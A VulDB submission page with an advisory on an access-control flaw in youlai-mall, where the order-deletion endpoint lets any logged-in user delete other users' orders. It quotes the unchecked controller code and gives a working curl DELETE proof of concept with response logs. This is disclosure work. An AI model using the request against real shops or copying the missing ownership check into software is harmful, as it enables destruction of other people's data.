提出 #708178: youlai-mall latest Improper Control of Resource Identifiers情報

タイトル	youlai-mall latest Improper Control of Resource Identifiers
説明	# youlai-mall improper access control in DELETE /mall-oms/app-api/v1/orders/{orderId} enables horizontal privilege escalation and unauthorized order deletion on victim accounts ## Contributors: Huang Weigang ### 1. Vulnerability Impact - youlai-mall (latest) - `https://github.com/youlaitech/youlai-mall` ### 2. Vulnerability Location - DELETE `/mall-oms/app-api/v1/orders/{orderId}` ### 3. Code Analysis - File: `mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java` - Route and method: - `@DeleteMapping("/{orderId}")` - `public Result<Boolean> deleteOrder(@PathVariable Long orderId) {` - ` boolean result = orderService.deleteById(orderId);` - ` return Result.success(result);` - `}` - Service: `mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/service/impl/OrderServiceImpl.java` - `public boolean deleteById(Long orderId) {` - ` return this.removeById(orderId);` - `}` - Issues: - No ownership check (missing validation that the provided `orderId` belongs to the current logged-in member, e.g., comparing order's `memberId` with `SecurityUtils.getMemberId()`). - No role/permission control (no `@PreAuthorize`; any authenticated App user can delete arbitrary orders). - Direct parameter trust (attacker-controlled `orderId` is used directly in database deletion without authorization). - Supports horizontal privilege escalation (attacker supplies victim's `orderId` and can delete their orders). - No state validation (missing check for order status; even paid/shipped orders could be deleted). - Lacks deletion auditing and soft-delete mechanism (hard delete without logging who initiated it). ### Vulnerability Reproduction -- Preconditions - Attacker has a valid App login token (`Authorization: Bearer <token>`). - Victim's `orderId` is known or discoverable (via enumeration, sequential IDs, or other BOLA endpoints). - Target Endpoint: `DELETE /mall-oms/app-api/v1/orders/{orderId}` -- Steps (horizontal privilege escalation: delete another user's order) - Log in as User A (memberId=100) and obtain a valid token. - Call the endpoint with User B's `orderId` (e.g., orderId=5001): - `curl -X DELETE -H "Authorization: Bearer <token>" "https://<gateway>/mall-oms/app-api/v1/orders/5001"` - Observe a 200 OK response, for example: - `{"code":"00000","data":true,"msg":"一切ok"}` - Outcome: Without any ownership validation, User A successfully deletes User B's order, causing data loss and business disruption. -- Example request/response log (reference) - "data": { - "request_data": { - "method": "DELETE", - "url": "`http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001`", - "params": {}, - "json": {}, - "data": {}, - "files": {} }, - "response_data": { - "code": "00000", - "data": true, - "msg": "一切ok" } }, - "test": { - "request_data": { - "method": "DELETE", - "url": "`http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001`", - "params": {}, - "json": {}, - "data": {}, - "files": {} }, - "response_data": { - "code": "00000", - "data": true, - "msg": "一切ok" } } ### 4. Impact Description - Unauthorized data deletion - Any logged-in user can delete arbitrary orders, causing permanent data loss and business record destruction. - Horizontal privilege escalation (BOLA/IDOR) - The `orderId` path parameter is not validated against the authenticated user's identity, allowing cross-account operations. - Business logic bypass - Order deletion should respect business rules (e.g., only pending/cancelled orders can be deleted), but this endpoint allows deletion of any order regardless of status. - Financial and operational impact - Deleting paid or shipped orders can cause financial discrepancies, inventory mismatches, and fulfillment failures. - Lack of audit trail and recovery - Hard delete without logging makes forensic investigation impossible and prevents data recovery. - Compliance violations - E-commerce platforms typically require order retention for accounting, tax, and legal purposes; unauthorized deletion violates these requirements. - Attack chain amplification - When combined with order enumeration or creation endpoints, attackers can systematically disrupt business operations across multiple accounts. - System trust erosion - Users and administrators lose confidence in data integrity and platform reliability, damaging reputation and business continuity.
ソース	⚠️ https://github.com/Hwwg/cve/issues/29
ユーザー	huangweigang (UID 88993)
送信	2025年12月07日 07:07 (6 月 ago)
モデレーション	2025年12月25日 10:50 (18 days later)
ステータス	重複
VulDBエントリ	334476 [youlaitech youlai-mall 1.0.0/2.0.0 /app-api/v1/orders/ orderId 特権昇格]
ポイント	0

◂ 前概要次 ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!